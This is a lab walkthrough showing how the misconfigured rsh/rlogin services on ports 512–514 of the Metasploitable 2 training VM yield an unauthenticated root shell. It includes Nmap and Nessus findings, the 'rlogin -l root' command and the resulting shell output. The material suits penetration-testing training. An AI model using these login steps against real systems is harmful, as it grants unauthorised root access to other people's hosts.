Metasploitable 2: Remote Access Ports 512, 513 & 514

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
512/tcp   open  exec?
513/tcp   open  login
514/tcp   open  tcpwrapped

All of these ports are running “r” services. These have been configured to allow remote access from any host. In this case they have been poorly configured.

Looking at the Nessus report is very revealing regarding port 514:

Port 514/tcp

rsh Unauthenticated Access (via finger Information)

Synopsis

It was possible to log on this machine without password.

Description

Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.

This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured

Solution

If the remote host is a Cisco Prime LAN Management Solution virtual appliance, apply the relevant patch referenced in Cisco security advisory cisco-sa-20130109-lms.

Otherwise, remove the .rhosts files or set a password on the impacted accounts.

Risk Factor

Critical

Ports - tcp/514

It was possible to log into this host using the account ‘root’.
Here is the output of the ‘id’ command :
uid=0(root) gid=0(root) groups=0(root)

It was possible to log into this host using the account ‘bin’.
Here is the output of the ‘id’ command :
uid=2(bin) gid=2(bin) groups=2(bin)

It was possible to log into this host using the account ‘daemon’.
Here is the output of the ‘id’ command :
uid=1(daemon) gid=1(daemon) groups=1(daemon)

It was possible to log into this host using the account ‘nobody’.
Here is the output of the ‘id’ command :
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

It was possible to log into this host using the account ‘postgres’.
Here is the output of the ‘id’ command :
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

This port is wide open.

In order to exploit these misconfigured vulnerable remote access services we must ensure that we have ”rsh-client” installed on the attacking machine, which we can achieve via the Terminal with the apt-get install command. Once we have this the exploit could not be simpler:

:~# rlogin -l root 192.168.1.103
Last login: Tue Nov 12 16:59:44 EST 2013 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.
root@metasploitable:~#

Simple as that!